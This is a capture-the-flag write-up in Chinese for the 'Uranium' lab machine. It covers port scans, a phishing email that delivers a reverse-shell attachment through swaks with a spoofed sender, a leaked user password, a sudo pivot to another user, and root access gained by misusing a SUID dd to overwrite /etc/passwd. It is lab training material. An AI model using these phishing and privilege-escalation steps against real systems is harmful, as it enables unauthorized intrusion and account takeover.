端口扫描

sudo nmap --min-rate 10000 -p- 10.10.254.128
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 14:59 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
sudo nmap -sT -sV -sC -O -p22,25,80 10.10.254.128                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 15:00 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a1:3c:d7:e9:d0:85:40:33:d5:07:16:32:08:63:31:05 (RSA)
| 256 24:81:0c:3a:91:55:a0:65:9e:36:58:71:51:13:6c:34 (ECDSA)
|_ 256 c2:94:2b:0d:8e:a9:53:f6:ef:34:db:f1:43:6c:c1:7e (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=uranium
| Subject Alternative Name: DNS:uranium
| Not valid before: 2021-04-09T21:40:53
|_Not valid after: 2031-04-07T21:40:53
|_smtp-commands: uranium, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Uranium Coin
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Adtran 424RG FTTH gateway (92%), Linux 5.4 (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: uranium; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.70 seconds
sudo nmap --script=vuln -p22,25,80 10.10.254.128                                                 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 15:01 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).

PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.254.128
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.254.128:80/
| Form id: demo-name
|_ Form action: #
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

Nmap done: 1 IP address (1 host up) scanned in 53.82 seconds

Web

看到25端口扫出来似乎有中间人攻击,但也先看一下80端口,是一个门户网站

扫目录有一个README.txt,但似乎和这个房间没什么关系

回到房间本身,发现原来给出了一个推特账号,有趣。得到了域名uranium.thm

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://uranium.thm' -H 'HOST:FUZZ.uranium.thm' -fs 10351

扫描一下有没有子域名,似乎没有

得知他的用户叫做hakanbey此外他说会在邮箱中自动查看application程序文件,那么也许可以钓鱼?

Getshell

写一个反弹shell,通过swaks工具可以发送

swaks --to hakanbey@uranium.thm --from genshin@mihoyo.com --header "Subject: Nothing" --body "nothhing" --server 10.10.254.128 --attach application

不一会儿就收到了反弹shell

横向移动

在家目录找到一个二进制程序

在/var/www/html界面竟然没有权限,像试着做个webshell,但是纯前端也做不了的样子。但是,在/var/log找到了一个pcap流量包,放到kali流量分析一下

全是没加密的tcp流量(喜

找到这一串

MBMD1vdpjg3kGv6SsIz56VNG
Hi Kral4
Hi bro
I forget my password, do you know my password ?
Yes, wait a sec I'll send you.
Oh , yes yes I remember. No need anymore. Ty..
Okay bro, take care !

试了一下都不是用户的密码,我才想起来家目录还有个二进制程序,运行的时候需要密码233随便输入聊天之后得到了hakanbey的密码:Mys3cr3tp4sw0rD

sudo -l发现可以变成kral4,不早说

sudo -u kral4 /bin/bash
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

找到一个可疑的dd命令,可以在任意地方写入文件和读取任意文件

提权

dd if=/var/www/html/web_flag.txt

可以试着覆盖/etc/passwd来新建一个root用户,在这之前最好先备份一下。

欸,但是竟然显示没有权限不知道为什么,明明是SUID但却没有/etc/passwd的权限。但是之前在/var/mail还找到了一封给kral4的邮件,是root写的

I give SUID to the nano file in your home folder to fix the attack on our  index.html. Keep the nano there, in case it happens again.

也就是说当index.html被攻击之后我们会得到有suid的nano

cp /bin/nano /home/kral4
echo "hacked" | dd of=/var/www/html/index.html

然而用GTFOBINS的提权方法提权失败了(悲

那就用之前准备好的更改/etc/passwd的方法

openssl passwd -1 -salt 123 password

生成密码为passwd

root:$1$123$0HaaUtbhct/mZ/Q/KRa5a.:0:0:root:/root:/bin/bash

把root那行改为上面这个

然后su!

碎碎念

非常有趣的房间。有很多模拟真实社工钓鱼的情景,可见房间作者水平之高。而且我也走了不少弯路